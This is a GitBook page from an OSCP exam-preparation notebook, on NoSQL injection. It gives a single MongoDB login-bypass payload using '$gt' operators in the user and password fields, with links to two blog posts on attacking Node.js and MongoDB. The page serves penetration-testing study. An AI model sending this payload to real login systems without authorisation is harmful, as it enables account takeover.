OSCP
OSCP
OSCP
OSCP
All About OSCP
OSCP- One Page Repository
About the Author
Basic Linux & Windows Commands
Recon (Scanning & Enumeration)
Web Application
My checklist
File Upload bypass
Enumeration and Exploitation
No-Sql Injection
SQL Injection
Hidden Files and directories
RFI
LFI
Brute Force
Shells
Transferring files
Priv Escalation
Post Exploitation
Pivoting
Buffer Overflow
Main Tools
MISC
CheatSheet (Short)
OSCP/ Vulnhub Practice learning
Powered by GitBook

No-Sql Injection

Login bypass

Basically change the query to this.

{"user":{"$gt": ""},"pass":{"$gt": ""}}

​http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html http://blog.websecurify.com/2014/08/attacks-nodejs-and-mongodb-part-to.html​

Previous
Enumeration and Exploitation
Next
SQL Injection
Last updated 2 years ago